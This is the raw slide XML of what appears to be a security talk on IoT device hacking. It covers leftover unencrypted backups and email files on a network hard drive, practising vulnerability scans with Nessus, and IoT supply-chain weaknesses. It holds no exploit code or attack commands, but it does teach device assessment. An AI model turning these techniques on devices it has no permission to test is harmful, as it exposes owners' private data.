        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="415137" y="1148114"/>
            <a:ext cx="11471995" cy="5762338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41"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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Noooooooope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5321" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Aria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7CA09E-D168-8BB7-E668-1A3AEFB1056F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609562" y="1769595"/>
            <a:ext cx="5934929" cy="4828558"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="130615" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>The user wiped their Time Machine Backups.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130615" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="130615" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>HOWEVER…The drive had 2 unencrypted computer backups present… but in the SMARTWARE folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130615" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="130615" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>The drive also included their OST files (easily recoverable / email) and a WHOLE lot more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130615" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD417C33-DD86-8D93-CA1F-73E361749898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609562" y="168194"/>
            <a:ext cx="10970378" cy="1354217"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting poor user behavior after the horse is glue…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DC7858D-0E98-0898-D102-E00EA04C1C06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6664313" y="1702106"/>
            <a:ext cx="5375790" cy="3878676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114288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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9766365" y="2268314"/>
            <a:ext cx="1813384" cy="3592808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="383419"/>
            <a:ext cx="10969994" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Rule #3 – “Do not practice that which is of no use.”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerability Scanning and Self-Training</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69F93AB-AF86-C3DF-5B45-78C7CF9DA438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470263" y="1567543"/>
            <a:ext cx="8895806" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Assume for a minute you have no idea how this device works or you have limited experience. The hard drive has a network port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>What is the first thing most people do in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> or device assessment?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>VULN SCANNING – Practice the tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ex. Use Nessus Essentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Why </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="261230" indent="-261230">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“Free license” – 16 IP Limit. Commercial Product is essential the same. This is what MANY orgs use as a baseline scanner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="261230" indent="-261230">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Configure your scan policy – Learn how the product works, tailor for your devices / challenges / understand how different interfaces / stack components work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="261230" indent="-261230">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Authenticated Scanning is relatively simple, handles many different types of devices (like IoT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="261230" indent="-261230">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IT DOES A GOOD JOB FINDING KNOWN ISSUES. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="261230" indent="-261230">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="276684" y="1333588"/>
            <a:ext cx="11611318" cy="5301264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47"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Scan Policy Configurations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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="153470" y="1382352"/>
            <a:ext cx="11610012" cy="5222459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49"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Scan Policy Configurations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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="73794" y="1658822"/>
            <a:ext cx="11537738" cy="4423090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51"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Scan Policy Credentials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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="903205" y="1334459"/>
            <a:ext cx="10708327" cy="4747453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53"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Scan Policy Plugins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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="553155" y="1382352"/>
            <a:ext cx="11300017" cy="4976030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55"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Scan Target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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="276684" y="1383222"/>
            <a:ext cx="2092467" cy="4975160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57"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Vulnerability Scan Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Picture 58"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2764917" y="1418053"/>
            <a:ext cx="8696407" cy="4712622"/>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2152-0FD7-CA28-C6CA-4EDBEE23C599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609562" y="506748"/>
            <a:ext cx="10970378" cy="677108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Issues with Capabilities Dev and Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15CD4DAC-7D10-05CC-8BB5-37C5889E2475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Capabilities development &amp; training tend to be expensive, simple, tool or vendor centric.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Difficult to stage “real” IoT and infrastructure, particularly in cloud / integration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Serious gap between what is “practiced” by red teamers and analysts and what APT groups actually do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Living off the Land isn’t something that is taught well or thoroughly in most cases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Systemic issues and thinking have deteriorated as the field changes, specializes, vendor ecosystems fracture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130615" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252978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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2400">
            <a:off x="734711" y="1109364"/>
            <a:ext cx="10595997" cy="5522876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60"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Uh oh…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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="95661" y="1377088"/>
            <a:ext cx="12189076" cy="5102728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="435678"/>
            <a:ext cx="10969994" cy="818814"/>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Maybe Western Digital can help?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328936" y="2299063"/>
            <a:ext cx="6254745" cy="4117643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23BED9D0-9021-F4EE-3ADD-55C462522415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6923314" y="2116183"/>
            <a:ext cx="4767943" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IoT is the wild west of device management, cloud management, vendor support, patching, and insecure supply chains.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The situation is not unique to these devices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not only can you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> these devices, understanding how they are sourced / rebranded / reuse components / how the supply chain works, taking these apart in a safe environment will unlock your IoT hacking skills.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you want to collect CVEs / build your resume, this is an excellent way to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA919221-DBD4-64B9-2C33-B38C9B3BEEF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757646" y="91169"/>
            <a:ext cx="10822294" cy="2031325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Rule #4 – Learn to stop worrying and love TECH DEBT: REBRANNDING / REUSE of components.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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584503" y="4423525"/>
            <a:ext cx="10197183" cy="2124250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="130615" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000EE"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.wizcase.com/blog/hack-2018/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3870" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="522461">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3870" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="291086"/>
            <a:ext cx="10969994" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
